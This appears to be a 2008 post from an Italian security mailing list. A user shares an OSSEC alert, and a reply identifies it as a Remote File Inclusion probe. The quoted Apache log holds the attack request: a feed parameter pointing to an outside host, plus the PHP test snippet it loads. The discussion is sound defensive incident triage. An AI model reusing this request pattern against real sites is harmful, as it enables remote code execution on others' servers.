On Friday 29 February 2008, Massimo Giaimo wrote: > Buongiorno a tutti, stamattina mi è arrivata una notifica da OSSEC, > installato su una macchina pubblica. Ecco il contenuto: > > OSSEC HIDS Notification. > 2008 Feb 29 01:29:21 > > Received From: *********->/var/log/apache2/access.log > Rule: 31106 fired (level 12) -> "A web attack returned code 200 (success)." > Portion of the log(s): > > 216.114.146.27 - - [29/Feb/2008:01:29:19 +0100] "GET > /index.php?option=com_rss&feed=http%3A%2F%2Fwww.interkonet.com%2Fenxicm >arxant%2Fweb%2Feditor%2Fscripts%2Ficons%2Fcatizi%2Farofo%2F&no_html=1 > HTTP/1.0" 200 2160 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; > .NET CLR 2.0.50727; .NET CLR 1.1.4322)" > > > Qualche idea? > > Grazie e buona giornata a tutti.
Sembra un tentativo di Remote File Inclusion (http://en.wikipedia.org/wiki/Remote_File_Inclusion). Difficile dire se lo script index.php permette effettivamente di utilizzare risorse esterne per eseguire codice arbitrario e quindi se si tratta di un falso positivo o cosa. Se fossi in te, darei molto velocemente uno sguardo all'applicazione... Nei log, la risorsa inclusa è: <?php echo md5("just_a_test");?> -- Luca Carettoni http://www.ikkisoft.com ________________________________________________________ http://www.sikurezza.org - Italian Security Mailing List
